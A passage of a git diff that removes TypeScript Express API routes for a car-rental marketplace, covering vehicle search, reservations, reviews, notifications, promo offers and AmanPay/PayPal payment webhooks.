req.params.id, companyId: req.companyId } }) - const url = await uploadImage(req.file.buffer, `companies/${req.companyId}/customers/${customer.id}`) - - if (customer.licenseImageUrl) { - await deleteImage(customer.licenseImageUrl).catch(() => null) - } - - const updated = await prisma.customer.update({ - where: { id: customer.id }, - data: { licenseImageUrl: url }, - }) - - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.post('/:id/approve-license', requireRole('MANAGER'), async (req, res, next) => { - try { - const { decision, note } = z.object({ decision: z.enum(['APPROVE', 'DENY']), note: z.string().optional() }).parse(req.body) - const customer = await prisma.customer.findFirstOrThrow({ where: { id: req.params.id, companyId: req.companyId } }) - const updated = await prisma.customer.update({ - where: { id: customer.id }, - data: { - licenseValidationStatus: decision === 'APPROVE' ? 'APPROVED' : 'DENIED', - licenseApprovedBy: `${req.employee.firstName} ${req.employee.lastName}`, - licenseApprovedAt: new Date(), - licenseApprovalNote: note ?? null, - }, - }) - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/routes/marketplace.ts b/apps/api/src/routes/marketplace.ts deleted file mode 100644 index 0b88c74..0000000 --- a/apps/api/src/routes/marketplace.ts +++ /dev/null @@ -1,456 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import { prisma } from '../lib/prisma' -import { optionalRenterAuth } from '../middleware/requireRenterAuth' -import { sendNotification, sendTransactionalEmail } from '../services/notificationService' -import { getVehicleAvailabilitySummary } from '../services/vehicleAvailabilityService' -import { marketplaceReservationEmail, type Lang } from '../lib/emailTranslations' - -const router = Router() -router.use(optionalRenterAuth) - -const paginationSchema = z.object({ - page: z.coerce.number().int().min(1).max(10000).default(1), - pageSize: z.coerce.number().int().min(1).max(100).default(20), -}) - -function isDatabaseUnavailableError(error: unknown): boolean { - if (!error || typeof error !== 'object') return false - - const candidate = error as { code?: string; message?: string } - return candidate.code === 'P1001' || candidate.message?.includes("Can't reach database server") === true -} - -router.get('/offers', async (req, res, next) => { - try { - const offers = await prisma.offer.findMany({ - where: { isPublic: true, isActive: true, validFrom: { lte: new Date() }, validUntil: { gte: new Date() } }, - include: { company: { include: { brand: { select: { displayName: true, logoUrl: true, subdomain: true, primaryColor: true } } } } }, - orderBy: [{ isFeatured: 'desc' }, { createdAt: 'desc' }], - take: 50, - }) - res.json({ data: offers }) - } catch (err) { - if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) - next(err) - } -}) - -router.get('/cities', async (_req, res, next) => { - try { - const companies = await prisma.company.findMany({ - where: { - status: { in: ['ACTIVE', 'TRIALING'] }, - brand: { - isListedOnMarketplace: true, - publicCity: { not: null }, - }, - }, - select: { - brand: { - select: { - publicCity: true, - }, - }, - }, - }) - - const uniqueCities = Array.from( - companies.reduce((cities, company) => { - const city = company.brand?.publicCity?.trim() - if (!city) return cities - - const normalizedCity = city.toLocaleLowerCase() - if (!cities.has(normalizedCity)) { - cities.set(normalizedCity, city) - } - return cities - }, new Map()), - ) - .map(([, city]) => city) - .sort((left, right) => left.localeCompare(right, undefined, { sensitivity: 'base' })) - - res.json({ data: uniqueCities }) - } catch (err) { - if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) - next(err) - } -}) - -router.get('/companies', async (req, res, next) => { - try { - const { city, hasOffer } = req.query as Record - const { page, pageSize } = paginationSchema.parse(req.query) - const safeCity = city ? city.trim().slice(0, 100) : undefined - const where: any = { status: { in: ['ACTIVE', 'TRIALING'] }, brand: { isListedOnMarketplace: true } } - if (safeCity) where.brand = { ...where.brand, publicCity: { contains: safeCity, mode: 'insensitive' } } - if (hasOffer === 'true') { - where.offers = { some: { isPublic: true, isActive: true, validUntil: { gte: new Date() } } } - } - - const companies = await prisma.company.findMany({ - where, - include: { - brand: { select: { displayName: true, logoUrl: true, subdomain: true, publicCity: true, publicCountry: true, marketplaceRating: true, primaryColor: true } }, - _count: { select: { vehicles: { where: { isPublished: true, status: 'AVAILABLE' } } } }, - }, - skip: (page - 1) * pageSize, - take: pageSize, - }) - res.json({ data: companies }) - } catch (err) { - if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) - next(err) - } -}) - -router.get('/search', async (req, res, next) => { - try { - const searchSchema = z.object({ - city: z.string().trim().max(100).optional(), - startDate: z.string().datetime().optional(), - endDate: z.string().datetime().optional(), - category: z.string().trim().max(50).optional(), - maxPrice: z.coerce.number().int().min(0).max(1_000_000).optional(), - transmission: z.string().trim().max(20).optional(), - make: z.string().trim().max(60).optional(), - model: z.string().trim().max(60).optional(), - }) - const { city, startDate, endDate, category, maxPrice, transmission, make, model } = searchSchema.parse(req.query) - const { page, pageSize } = paginationSchema.parse(req.query) - - const where: any = { isPublished: true, status: 'AVAILABLE', company: { status: { in: ['ACTIVE', 'TRIALING'] }, brand: { isListedOnMarketplace: true } } } - if (category) where.category = category - if (maxPrice !== undefined) where.dailyRate = { lte: maxPrice } - if (transmission) where.transmission = transmission - if (make) where.make = { contains: make, mode: 'insensitive' } - if (model) where.model = { contains: model, mode: 'insensitive' } - if (city) where.company = { ...where.company, brand: { isListedOnMarketplace: true, publicCity: { contains: city, mode: 'insensitive' } } } - - const vehicles = await prisma.vehicle.findMany({ - where, - include: { - company: { include: { brand: { select: { displayName: true, logoUrl: true, subdomain: true, marketplaceRating: true, primaryColor: true } } } }, - }, - skip: (page - 1) * pageSize, - take: pageSize, - orderBy: { dailyRate: 'asc' }, - }) - - const typedVehicles = vehicles as Array<(typeof vehicles)[number]> - - const availabilityByVehicleId = new Map( - await Promise.all( - typedVehicles.map(async (vehicle) => { - const availability = await getVehicleAvailabilitySummary(vehicle.id, { - range: startDate && endDate - ? { startDate: new Date(startDate), endDate: new Date(endDate) } - : undefined, - }) - return [vehicle.id, availability] as const - }), - ), - ) - - res.json({ - data: typedVehicles.map((vehicle) => ({ - ...vehicle, - availability: availabilityByVehicleId.get(vehicle.id)?.available ?? null, - availabilityStatus: availabilityByVehicleId.get(vehicle.id)?.status ?? 'AVAILABLE', - nextAvailableAt: availabilityByVehicleId.get(vehicle.id)?.nextAvailableAt ?? null, - })), - }) - } catch (err) { - if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) - next(err) - } -}) - -router.post('/reservations', async (req, res, next) => { - try { - const schema = z.object({ - vehicleId: z.string().cuid(), - companySlug: z.string().trim().max(100), - firstName: z.string().min(1).max(100), - lastName: z.string().min(1).max(100), - email: z.string().email(), - phone: z.string().max(30).optional(), - startDate: z.string().datetime(), - endDate: z.string().datetime(), - notes: z.string().max(500).optional(), - language: z.enum(['en', 'fr', 'ar']).default('fr'), - }) - - const body = schema.parse(req.body) - const startDate = new Date(body.startDate) - const endDate = new Date(body.endDate) - - if (endDate <= startDate) { - return res.status(400).json({ error: 'invalid_dates', message: 'End date must be after start date', statusCode: 400 }) - } - - const vehicle = await prisma.vehicle.findFirst({ - where: { id: body.vehicleId, isPublished: true, company: { slug: body.companySlug, status: { in: ['ACTIVE', 'TRIALING'] } } }, - include: { company: { include: { brand: true } } }, - }) - if (!vehicle) return res.status(404).json({ error: 'not_found', message: 'Vehicle not found', statusCode: 404 }) - - const availability = await getVehicleAvailabilitySummary(body.vehicleId, { - range: { startDate, endDate }, - }) - if (!availability.available) { - return res.status(409).json({ - error: 'unavailable', - message: 'Vehicle is not available for the selected dates', - statusCode: 409, - nextAvailableAt: availability.nextAvailableAt?.toISOString() ?? null, - }) - } - - const customer = await prisma.customer.upsert({ - where: { companyId_email: { companyId: vehicle.companyId, email: body.email } }, - create: { companyId: vehicle.companyId, firstName: body.firstName, lastName: body.lastName, email: body.email, phone: body.phone }, - update: { firstName: body.firstName, lastName: body.lastName, ...(body.phone ? { phone: body.phone } : {}) }, - }) - - const totalDays = Math.max(1, Math.ceil((endDate.getTime() - startDate.getTime()) / 86_400_000)) - const totalAmount = vehicle.dailyRate * totalDays - - const reservation = await prisma.reservation.create({ - data: { - companyId: vehicle.companyId, - vehicleId: body.vehicleId, - customerId: customer.id, - source: 'MARKETPLACE', - status: 'DRAFT', - startDate, - endDate, - dailyRate: vehicle.dailyRate, - totalDays, - totalAmount, - notes: body.notes, - }, - }) - - const lang = body.language as Lang - const companyName = vehicle.company.brand?.displayName ?? vehicle.company.name - const rateDisplay = (vehicle.dailyRate / 100).toFixed(2) - const totalDisplay = (totalAmount / 100).toFixed(2) - const startStr = startDate.toISOString().slice(0, 10) - const endStr = endDate.toISOString().slice(0, 10) - const emailOpts = { firstName: body.firstName, vehicleYear: vehicle.year, vehicleMake: vehicle.make, vehicleModel: vehicle.model, companyName, startDate, endDate, totalDays, rateDisplay, totalDisplay, email: body.email, phone: body.phone } - - try { - await sendTransactionalEmail({ - to: body.email, - subject: marketplaceReservationEmail.subject(`${vehicle.make} ${vehicle.model}`, lang), - html: marketplaceReservationEmail.html(emailOpts, lang), - text: marketplaceReservationEmail.text(emailOpts, lang), - }) - } catch { - // email failure is non-blocking — reservation still created - } - - try { - await sendNotification({ - type: 'NEW_BOOKING', - title: 'New Marketplace Reservation Request', - body: `${body.firstName} ${body.lastName} requested ${vehicle.make} ${vehicle.model} from ${startStr} to ${endStr}.`, - companyId: vehicle.companyId, - channels: ['IN_APP'], - }) - } catch { - // notification failure is non-blocking - } - - res.status(201).json({ data: { reservationId: reservation.id } }) - } catch (err) { - if (isDatabaseUnavailableError(err)) { - return res.status(503).json({ error: 'database_unavailable', message: 'Service temporarily unavailable', statusCode: 503 }) - } - next(err) - } -}) - -router.get('/:slug', async (req, res, next) => { - try { - const company = await prisma.company.findFirst({ - where: { slug: req.params.slug, status: { in: ['ACTIVE', 'TRIALING'] } }, - include: { - brand: true, - vehicles: { where: { isPublished: true, status: 'AVAILABLE' }, orderBy: { createdAt: 'desc' } }, - offers: { where: { isPublic: true, isActive: true, validUntil: { gte: new Date() } }, orderBy: { isFeatured: 'desc' } }, - }, - }) - if (!company) return res.status(404).json({ error: 'not_found', message: 'Company not found', statusCode: 404 }) - const vehicles = await Promise.all( - company.vehicles.map(async (vehicle) => { - const availability = await getVehicleAvailabilitySummary(vehicle.id) - return { - ...vehicle, - availability: availability.available, - availabilityStatus: availability.status, - nextAvailableAt: availability.nextAvailableAt, - } - }), - ) - res.json({ data: { ...company, vehicles } }) - } catch (err) { - if (isDatabaseUnavailableError(err)) { - return res.status(503).json({ error: 'database_unavailable', message: 'Marketplace data is temporarily unavailable', statusCode: 503 }) - } - next(err) - } -}) - -router.get('/:slug/reviews', async (req, res, next) => { - try { - const company = await prisma.company.findFirstOrThrow({ where: { slug: req.params.slug } }) - const reviews = await prisma.review.findMany({ - where: { companyId: company.id, isPublished: true }, - include: { renter: { select: { firstName: true, lastName: true } } }, - orderBy: { createdAt: 'desc' }, - take: 50, - }) - res.json({ data: reviews }) - } catch (err) { - if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) - next(err) - } -}) - -router.get('/:slug/vehicles', async (req, res, next) => { - try { - const company = await prisma.company.findFirstOrThrow({ where: { slug: req.params.slug, status: { in: ['ACTIVE', 'TRIALING'] } } }) - const vehicles = await prisma.vehicle.findMany({ - where: { companyId: company.id, isPublished: true, status: 'AVAILABLE' }, - orderBy: { createdAt: 'desc' }, - }) - res.json({ data: vehicles }) - } catch (err) { - if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) - next(err) - } -}) - -router.get('/:slug/vehicles/:id', async (req, res, next) => { - try { - const company = await prisma.company.findFirstOrThrow({ where: { slug: req.params.slug, status: { in: ['ACTIVE', 'TRIALING'] } } }) - const vehicle = await prisma.vehicle.findFirstOrThrow({ - where: { id: req.params.id, companyId: company.id, isPublished: true, status: 'AVAILABLE' }, - include: { - company: { include: { brand: true } }, - }, - }) - const availability = await getVehicleAvailabilitySummary(vehicle.id) - res.json({ data: { ...vehicle, availabilityStatus: availability.status, availability: availability.available, nextAvailableAt: availability.nextAvailableAt } }) - } catch (err) { - if (isDatabaseUnavailableError(err)) { - return res.status(503).json({ error: 'database_unavailable', message: 'Vehicle details are temporarily unavailable', statusCode: 503 }) - } - next(err) - } -}) - -router.get('/:slug/offers', async (req, res, next) => { - try { - const company = await prisma.company.findFirstOrThrow({ where: { slug: req.params.slug, status: { in: ['ACTIVE', 'TRIALING'] } } }) - const offers = await prisma.offer.findMany({ - where: { - companyId: company.id, - isPublic: true, - isActive: true, - validFrom: { lte: new Date() }, - validUntil: { gte: new Date() }, - }, - orderBy: [{ isFeatured: 'desc' }, { createdAt: 'desc' }], - }) - res.json({ data: offers }) - } catch (err) { - if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) - next(err) - } -}) - -// ─── Review token endpoints ─────────────────────────────────── - -router.get('/review/:token', async (req, res, next) => { - try { - const reservation = await prisma.reservation.findUnique({ - where: { reviewToken: req.params.token }, - include: { - vehicle: { select: { make: true, model: true, year: true, photos: true } }, - company: { include: { brand: { select: { displayName: true, logoUrl: true } } } }, - review: { select: { id: true } }, - }, - }) - if (!reservation) return res.status(404).json({ error: 'invalid_token', message: 'Review link is invalid or has expired', statusCode: 404 }) - if (reservation.review) return res.status(409).json({ error: 'already_reviewed', message: 'A review has already been submitted for this reservation', statusCode: 409 }) - - res.json({ - data: { - reservationId: reservation.id, - companyName: reservation.company.brand?.displayName ?? reservation.company.name, - companyLogoUrl: reservation.company.brand?.logoUrl ?? null, - vehicle: `${reservation.vehicle.year} ${reservation.vehicle.make} ${reservation.vehicle.model}`, - vehiclePhoto: reservation.vehicle.photos[0] ?? null, - }, - }) - } catch (err) { next(err) } -}) - -router.post('/review/:token', async (req, res, next) => { - try { - const body = z.object({ - overallRating: z.number().int().min(1).max(5), - vehicleRating: z.number().int().min(1).max(5).optional(), - serviceRating: z.number().int().min(1).max(5).optional(), - comment: z.string().max(2000).optional(), - }).parse(req.body) - - const reservation = await prisma.reservation.findUnique({ - where: { reviewToken: req.params.token }, - include: { review: { select: { id: true } } }, - }) - if (!reservation) return res.status(404).json({ error: 'invalid_token', message: 'Review link is invalid or has expired', statusCode: 404 }) - if (reservation.review) return res.status(409).json({ error: 'already_reviewed', message: 'A review has already been submitted for this reservation', statusCode: 409 }) - - const review = await prisma.review.create({ - data: { - reservationId: reservation.id, - companyId: reservation.companyId, - renterId: reservation.renterId ?? undefined, - overallRating: body.overallRating, - vehicleRating: body.vehicleRating, - serviceRating: body.serviceRating, - comment: body.comment, - isPublished: true, - }, - }) - - // Invalidate token so the link can't be reused - await prisma.reservation.update({ where: { id: reservation.id }, data: { reviewToken: null } }) - - res.status(201).json({ data: { reviewId: review.id } }) - } catch (err) { next(err) } -}) - -router.post('/offers/:code/validate', async (req, res, next) => { - try { - const offer = await prisma.offer.findFirst({ - where: { promoCode: req.params.code, isActive: true, validFrom: { lte: new Date() }, validUntil: { gte: new Date() } }, - }) - if (!offer) return res.status(404).json({ error: 'invalid_code', message: 'Promo code not found or expired', statusCode: 404 }) - if (offer.maxRedemptions && offer.redemptionCount >= offer.maxRedemptions) { - return res.status(409).json({ error: 'code_exhausted', message: 'Promo code has reached its maximum redemptions', statusCode: 409 }) - } - res.json({ data: offer }) - } catch (err) { - if (isDatabaseUnavailableError(err)) { - return res.status(503).json({ error: 'database_unavailable', message: 'Offer validation is temporarily unavailable', statusCode: 503 }) - } - next(err) - } -}) - -export default router diff --git a/apps/api/src/routes/notifications.ts b/apps/api/src/routes/notifications.ts deleted file mode 100644 index 28c742f..0000000 --- a/apps/api/src/routes/notifications.ts +++ /dev/null @@ -1,128 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import { prisma } from '../lib/prisma' -import { requireCompanyAuth } from '../middleware/requireCompanyAuth' -import { requireTenant } from '../middleware/requireTenant' -import { requireSubscription } from '../middleware/requireSubscription' -import { requireRenterAuth } from '../middleware/requireRenterAuth' -import { NotificationType, NotificationChannel } from '@rentaldrivego/database' - -const router = Router() - -// ─── Company notifications ──────────────────────────────────── - -const companyAuth = [requireCompanyAuth, requireTenant, requireSubscription] - -router.get('/company', ...companyAuth, async (req: any, res: any, next: any) => { - try { - const { unread } = req.query as Record - const where: any = { companyId: req.companyId, channel: 'IN_APP' } - if (unread === 'true') where.readAt = null - const notifications = await prisma.notification.findMany({ where, orderBy: { createdAt: 'desc' }, take: 50 }) - res.json({ data: notifications }) - } catch (err) { next(err) } -}) - -router.get('/unread-count', ...companyAuth, async (req: any, res: any, next: any) => { - try { - const unread = await prisma.notification.count({ - where: { companyId: req.companyId, channel: 'IN_APP', readAt: null }, - }) - res.json({ data: { unread } }) - } catch (err) { next(err) } -}) - -router.post('/company/:id/read', ...companyAuth, async (req: any, res: any, next: any) => { - try { - await prisma.notification.updateMany({ where: { id: req.params.id, companyId: req.companyId }, data: { readAt: new Date(), status: 'READ' } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.post('/company/read-all', ...companyAuth, async (req: any, res: any, next: any) => { - try { - await prisma.notification.updateMany({ where: { companyId: req.companyId, readAt: null }, data: { readAt: new Date(), status: 'READ' } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.get('/company/preferences', ...companyAuth, async (req: any, res: any, next: any) => { - try { - const prefs = await prisma.notificationPreference.findMany({ where: { employeeId: req.employee.id } }) - res.json({ data: prefs }) - } catch (err) { next(err) } -}) - -router.patch('/company/preferences', ...companyAuth, async (req: any, res: any, next: any) => { - try { - const body = z.array(z.object({ notificationType: z.string(), channel: z.string(), enabled: z.boolean() })).parse(req.body) - for (const pref of body) { - await prisma.notificationPreference.upsert({ - where: { employeeId_notificationType_channel: { employeeId: req.employee.id, notificationType: pref.notificationType as NotificationType, channel: pref.channel as NotificationChannel } }, - create: { employeeId: req.employee.id, notificationType: pref.notificationType as NotificationType, channel: pref.channel as NotificationChannel, enabled: pref.enabled }, - update: { enabled: pref.enabled }, - }) - } - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -// ─── Renter notifications ───────────────────────────────────── - -router.get('/renter', requireRenterAuth, async (req: any, res: any, next: any) => { - try { - const notifications = await prisma.notification.findMany({ where: { renterId: req.renterId, channel: 'IN_APP' }, orderBy: { createdAt: 'desc' }, take: 50 }) - res.json({ data: notifications }) - } catch (err) { next(err) } -}) - -router.post('/renter/:id/read', requireRenterAuth, async (req: any, res: any, next: any) => { - try { - await prisma.notification.updateMany({ where: { id: req.params.id, renterId: req.renterId }, data: { readAt: new Date(), status: 'READ' } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.post('/renter/read-all', requireRenterAuth, async (req: any, res: any, next: any) => { - try { - await prisma.notification.updateMany({ - where: { renterId: req.renterId, channel: 'IN_APP', readAt: null }, - data: { readAt: new Date(), status: 'READ' }, - }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.get('/renter/preferences', requireRenterAuth, async (req: any, res: any, next: any) => { - try { - const prefs = await prisma.notificationPreference.findMany({ where: { renterId: req.renterId } }) - res.json({ data: prefs }) - } catch (err) { next(err) } -}) - -router.patch('/renter/preferences', requireRenterAuth, async (req: any, res: any, next: any) => { - try { - const body = z.array(z.object({ notificationType: z.string(), channel: z.string(), enabled: z.boolean() })).parse(req.body) - for (const pref of body) { - await prisma.notificationPreference.upsert({ - where: { - renterId_notificationType_channel: { - renterId: req.renterId, - notificationType: pref.notificationType as NotificationType, - channel: pref.channel as NotificationChannel, - }, - }, - create: { - renterId: req.renterId, - notificationType: pref.notificationType as NotificationType, - channel: pref.channel as NotificationChannel, - enabled: pref.enabled, - }, - update: { enabled: pref.enabled }, - }) - } - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/routes/offers.ts b/apps/api/src/routes/offers.ts deleted file mode 100644 index 7cd11d1..0000000 --- a/apps/api/src/routes/offers.ts +++ /dev/null @@ -1,111 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import { prisma } from '../lib/prisma' -import { requireCompanyAuth } from '../middleware/requireCompanyAuth' -import { requireTenant } from '../middleware/requireTenant' -import { requireSubscription } from '../middleware/requireSubscription' -import { requireRole } from '../middleware/requireRole' - -const router = Router() -router.use(requireCompanyAuth, requireTenant, requireSubscription) - -const offerSchema = z.object({ - title: z.string().min(1), - description: z.string().optional(), - termsAndConds: z.string().optional(), - type: z.enum(['PERCENTAGE','FIXED_AMOUNT','FREE_DAY','SPECIAL_RATE']), - discountValue: z.number().int().min(0), - specialRate: z.number().int().optional(), - appliesToAll: z.boolean().default(true), - categories: z.array(z.enum(['ECONOMY','COMPACT','MIDSIZE','FULLSIZE','SUV','LUXURY','VAN','TRUCK'])).default([]), - minRentalDays: z.number().int().optional(), - maxRentalDays: z.number().int().optional(), - promoCode: z.string().optional(), - maxRedemptions: z.number().int().optional(), - validFrom: z.string().datetime(), - validUntil: z.string().datetime(), - isActive: z.boolean().default(true), - isPublic: z.boolean().default(true), - isFeatured: z.boolean().default(false), - vehicleIds: z.array(z.string()).default([]), -}) - -router.get('/', async (req, res, next) => { - try { - const { active, public: pub } = req.query as Record - const where: any = { companyId: req.companyId } - if (active !== undefined) where.isActive = active === 'true' - if (pub !== undefined) where.isPublic = pub === 'true' - const offers = await prisma.offer.findMany({ where, orderBy: { createdAt: 'desc' } }) - res.json({ data: offers }) - } catch (err) { next(err) } -}) - -router.post('/', requireRole('MANAGER'), async (req, res, next) => { - try { - const { vehicleIds, ...body } = offerSchema.parse(req.body) - const offer = await prisma.offer.create({ - data: { ...body, companyId: req.companyId, validFrom: new Date(body.validFrom), validUntil: new Date(body.validUntil), vehicles: vehicleIds.length > 0 ? { create: vehicleIds.map((id) => ({ vehicleId: id })) } : undefined }, - include: { vehicles: true }, - }) - res.status(201).json({ data: offer }) - } catch (err) { next(err) } -}) - -router.get('/:id', async (req, res, next) => { - try { - const offer = await prisma.offer.findFirstOrThrow({ where: { id: req.params.id, companyId: req.companyId }, include: { vehicles: true } }) - res.json({ data: offer }) - } catch (err) { next(err) } -}) - -router.patch('/:id', requireRole('MANAGER'), async (req, res, next) => { - try { - const { id } = z.object({ id: z.string() }).parse(req.params) - const { vehicleIds, ...body } = offerSchema.partial().parse(req.body) - const existing = await prisma.offer.findFirst({ where: { id, companyId: req.companyId } }) - if (!existing) return res.status(404).json({ error: 'not_found', message: 'Offer not found', statusCode: 404 }) - await prisma.$transaction(async (tx) => { - await tx.offer.update({ where: { id }, data: { ...body, validFrom: body.validFrom ? new Date(body.validFrom) : undefined, validUntil: body.validUntil ? new Date(body.validUntil) : undefined } }) - if (vehicleIds !== undefined) { - await tx.offerVehicle.deleteMany({ where: { offerId: id } }) - if (vehicleIds.length > 0) { - await tx.offerVehicle.createMany({ data: vehicleIds.map((vehicleId) => ({ offerId: id, vehicleId })) }) - } - } - }) - const updated = await prisma.offer.findUniqueOrThrow({ where: { id }, include: { vehicles: true } }) - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.delete('/:id', requireRole('MANAGER'), async (req, res, next) => { - try { - await prisma.offer.deleteMany({ where: { id: req.params.id, companyId: req.companyId } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.post('/:id/activate', requireRole('MANAGER'), async (req, res, next) => { - try { - await prisma.offer.updateMany({ where: { id: req.params.id, companyId: req.companyId }, data: { isActive: true } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.post('/:id/deactivate', requireRole('MANAGER'), async (req, res, next) => { - try { - await prisma.offer.updateMany({ where: { id: req.params.id, companyId: req.companyId }, data: { isActive: false } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.get('/:id/stats', async (req, res, next) => { - try { - const offer = await prisma.offer.findFirstOrThrow({ where: { id: req.params.id, companyId: req.companyId } }) - const reservations = await prisma.reservation.count({ where: { offerId: offer.id } }) - res.json({ data: { redemptions: offer.redemptionCount, reservations } }) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/routes/payments.ts b/apps/api/src/routes/payments.ts deleted file mode 100644 index 6d8e94d..0000000 --- a/apps/api/src/routes/payments.ts +++ /dev/null @@ -1,327 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import { prisma } from '../lib/prisma' -import { requireCompanyAuth } from '../middleware/requireCompanyAuth' -import { requireTenant } from '../middleware/requireTenant' -import { requireSubscription } from '../middleware/requireSubscription' -import { requireRole } from '../middleware/requireRole' -import * as amanpay from '../services/amanpayService' -import * as paypal from '../services/paypalService' - -const router = Router() - -// ─── Webhook endpoints (no auth — must come before middleware) ────────────── - -router.post('/webhooks/amanpay', async (req, res, next) => { - try { - const rawBody = JSON.stringify(req.body) - const signature = req.headers['x-amanpay-signature'] as string ?? '' - - if (amanpay.isConfigured() && !amanpay.verifyWebhookSignature(rawBody, signature)) { - return res.status(401).json({ error: 'invalid_signature' }) - } - - const event = req.body - const transactionId = event.transaction_id ?? event.id - const orderId = event.order_id ?? event.metadata?.order_id - const status = event.status?.toUpperCase() - - if (status === 'PAID' || status === 'SUCCEEDED') { - const payment = await prisma.rentalPayment.findFirst({ where: { amanpayTransactionId: transactionId } }) - if (payment) { - await prisma.rentalPayment.update({ - where: { id: payment.id }, - data: { status: 'SUCCEEDED', paidAt: new Date() }, - }) - await prisma.reservation.update({ - where: { id: payment.reservationId }, - data: { paymentStatus: 'PAID', paidAmount: { increment: payment.amount } }, - }) - } - } else if (status === 'FAILED') { - await prisma.rentalPayment.updateMany({ - where: { amanpayTransactionId: transactionId }, - data: { status: 'FAILED' }, - }) - } - - res.json({ received: true }) - } catch (err) { next(err) } -}) - -router.post('/webhooks/paypal', async (req, res, next) => { - try { - const rawBody = JSON.stringify(req.body) - const isValid = await paypal.verifyWebhookEvent( - req.headers as Record, - rawBody, - ) - if (paypal.isConfigured() && !isValid) { - return res.status(401).json({ error: 'invalid_signature' }) - } - - const event = req.body - const eventType = event.event_type as string - - if (eventType === 'PAYMENT.CAPTURE.COMPLETED') { - const captureId = event.resource?.id as string - const payment = await prisma.rentalPayment.findFirst({ where: { paypalCaptureId: captureId } }) - if (payment) { - await prisma.rentalPayment.update({ - where: { id: payment.id }, - data: { status: 'SUCCEEDED', paidAt: new Date() }, - }) - await prisma.reservation.update({ - where: { id: payment.reservationId }, - data: { paymentStatus: 'PAID', paidAmount: { increment: payment.amount } }, - }) - } - } else if (eventType === 'PAYMENT.CAPTURE.DENIED') { - const captureId = event.resource?.id as string - await prisma.rentalPayment.updateMany({ - where: { paypalCaptureId: captureId }, - data: { status: 'FAILED' }, - }) - } - - res.json({ received: true }) - } catch (err) { next(err) } -}) - -// ─── Authenticated routes ──────────────────────────────────────────────────── - -router.use(requireCompanyAuth, requireTenant, requireSubscription) - -const chargeSchema = z.object({ - provider: z.enum(['AMANPAY', 'PAYPAL']), - type: z.enum(['CHARGE', 'DEPOSIT']).default('CHARGE'), - currency: z.enum(['MAD', 'USD', 'EUR']).default('MAD'), - successUrl: z.string().url(), - failureUrl: z.string().url(), -}) - -const manualPaymentSchema = z.object({ - amount: z.number().int().positive(), - currency: z.enum(['MAD', 'USD', 'EUR']).default('MAD'), - type: z.enum(['CHARGE', 'DEPOSIT']).default('CHARGE'), - paymentMethod: z.enum(['CASH', 'CHECK', 'BANK_TRANSFER', 'CARD', 'PAYPAL']), -}) - -router.get('/company', async (req, res, next) => { - try { - const payments = await prisma.rentalPayment.findMany({ - where: { companyId: req.companyId }, - include: { - reservation: { - include: { - customer: true, - vehicle: true, - }, - }, - }, - orderBy: { createdAt: 'desc' }, - take: 100, - }) - res.json({ data: payments }) - } catch (err) { next(err) } -}) - -router.get('/reservations/:id', async (req, res, next) => { - try { - const payments = await prisma.rentalPayment.findMany({ - where: { reservationId: req.params.id, companyId: req.companyId }, - orderBy: { createdAt: 'desc' }, - }) - res.json({ data: payments }) - } catch (err) { next(err) } -}) - -router.post('/reservations/:id/charge', requireRole('MANAGER'), async (req, res, next) => { - try { - const { provider, type, currency, successUrl, failureUrl } = chargeSchema.parse(req.body) - - const reservation = await prisma.reservation.findFirstOrThrow({ - where: { id: req.params.id, companyId: req.companyId }, - include: { vehicle: true, customer: true }, - }) - - if (reservation.paymentStatus === 'PAID') { - return res.status(409).json({ error: 'already_paid', message: 'Reservation is already fully paid', statusCode: 409 }) - } - - const amount = type === 'DEPOSIT' ? reservation.depositAmount : reservation.totalAmount - const description = `${type === 'DEPOSIT' ? 'Deposit' : 'Rental'}: ${reservation.vehicle.make} ${reservation.vehicle.model}` - const orderId = `${reservation.id}-${type}-${Date.now()}` - const webhookBase = process.env.API_URL ?? 'http://localhost:4000' - - let checkoutUrl: string - let amanpayTransactionId: string | null = null - let paypalCaptureId: string | null = null - - if (provider === 'AMANPAY') { - if (!amanpay.isConfigured()) { - return res.status(503).json({ error: 'provider_not_configured', message: 'AmanPay is not configured', statusCode: 503 }) - } - const result = await amanpay.createCheckout({ - amount, - currency, - orderId, - description, - customerEmail: reservation.customer.email, - customerName: `${reservation.customer.firstName} ${reservation.customer.lastName}`, - successUrl, - failureUrl, - webhookUrl: `${webhookBase}/api/v1/payments/webhooks/amanpay`, - }) - checkoutUrl = result.checkoutUrl - amanpayTransactionId = result.transactionId - } else { - if (!paypal.isConfigured()) { - return res.status(503).json({ error: 'provider_not_configured', message: 'PayPal is not configured', statusCode: 503 }) - } - const result = await paypal.createOrder({ - amount, - currency, - orderId, - description, - returnUrl: successUrl, - cancelUrl: failureUrl, - }) - checkoutUrl = result.approveUrl - paypalCaptureId = result.orderId - } - - const payment = await prisma.rentalPayment.create({ - data: { - companyId: req.companyId, - reservationId: reservation.id, - amount, - currency, - status: 'PENDING', - type, - paymentProvider: provider, - amanpayTransactionId, - paypalCaptureId, - }, - }) - - res.json({ data: { payment, checkoutUrl } }) - } catch (err) { next(err) } -}) - -router.post('/reservations/:id/capture-paypal', requireRole('MANAGER'), async (req, res, next) => { - try { - const { paypalOrderId } = z.object({ paypalOrderId: 